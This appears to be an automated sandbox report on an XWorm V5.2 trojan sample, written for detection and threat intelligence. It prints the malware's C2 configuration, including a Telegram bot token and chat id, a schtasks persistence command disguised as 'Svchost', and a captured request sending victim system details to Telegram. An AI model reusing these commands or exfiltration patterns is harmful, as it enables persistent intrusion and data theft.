Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
Analysis ID: 1387375
MD5: 8dcbb40394210dc5287028e66fdbf0c7
SHA1: eb367c12ee4e8338a891b563f0b19204197c2ab9
SHA256: 526a3df9f947f4f372d58e8c0065792ab027f06b49fd4f7c705280b199b541a9
Tags: exe
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe (PID: 1072 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe MD5: 8DCBB40394210DC5287028E66FDBF0C7)
    • X.exe (PID: 3280 cmdline: "C:\Users\user\AppData\Roaming\X.exe" MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
      • schtasks.exe (PID: 6560 cmdline: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 6768 cmdline: C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • 61c7cdb3196df.exe (PID: 2072 cmdline: "C:\Users\user\AppData\Roaming\61c7cdb3196df.exe" MD5: C0E5B07CBF2D02C54F39CE6AAD676DC7)
  • svchost.exe (PID: 7096 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5096 cmdline: C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 4212 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\Svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\Temp\Svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x78b2:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\X.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\X.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7876:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7913:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7a28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x76b2:$cnc4: POST / HTTP/1.1
00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1f08e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x280ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1f12b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x2816b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1f240:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x28280:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1eeca:$cnc4: POST / HTTP/1.1
  • 0x27f0a:$cnc4: POST / HTTP/1.1
Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe PID: 1072 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
2.0.X.exe.960000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
2.0.X.exe.960000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.0.X.exe.960000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x78b2:$cnc4: POST / HTTP/1.1
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x5c76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x5d13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5e28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x5ab2:$cnc4: POST / HTTP/1.1

                      System Summary

                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetFilename: C:\Users\user\AppData\Local\Temp\Svchost.exe
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\X.exe" , ParentImage: C:\Users\user\AppData\Roaming\X.exe, ParentProcessId: 3280, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 6560, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\X.exe" , CommandLine: "C:\Users\user\AppData\Roaming\X.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\X.exe, NewProcessName: C:\Users\user\AppData\Roaming\X.exe, OriginalFileName: C:\Users\user\AppData\Roaming\X.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, ParentProcessId: 1072, ParentProcessName: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\X.exe" , ProcessId: 3280, ProcessName: X.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7096, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\X.exe" , ParentImage: C:\Users\user\AppData\Roaming\X.exe, ParentProcessId: 3280, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 6560, ProcessName: schtasks.exe
                      No Snort rule has matched

                      AV Detection

                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\X.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
                      Source: eu-central-7075.packetriot.netVirustotal: Detection: 13%
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeVirustotal: Detection: 76%
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeVirustotal: Detection: 9%
                      Source: C:\Users\user\AppData\Roaming\X.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Roaming\X.exeVirustotal: Detection: 76%
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeVirustotal: Detection: 72%
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Roaming\X.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49784 version: TLS 1.2
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      Source: Malware configuration extractorURLs: trusting-smoke-90361.pktriot.net
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.9:49706 -> 167.71.56.116:22100
                      Source: global trafficHTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 167.71.56.116 167.71.56.116
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: svchost.exe, 00000013.00000002.3876634036.000002A0E1EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: svchost.exe, 00000013.00000002.3878556121.000002A0E2E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                      Source: svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyn
                      Source: svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scdy
                      Source: svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicy
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878483640.000002A0E2E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustm
                      Source: X.exe, 00000002.00000002.2839168791.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                      Source: svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                      Source: svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802443282.000002A0E2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, X.exe, 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, X.exe, 00000002.00000002.2839168791.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, X.exe.0.dr, Svchost.exe.2.dr
                      String found in binary or memory: https://api.telegram.org/bot
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802257228.000002A0E275A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
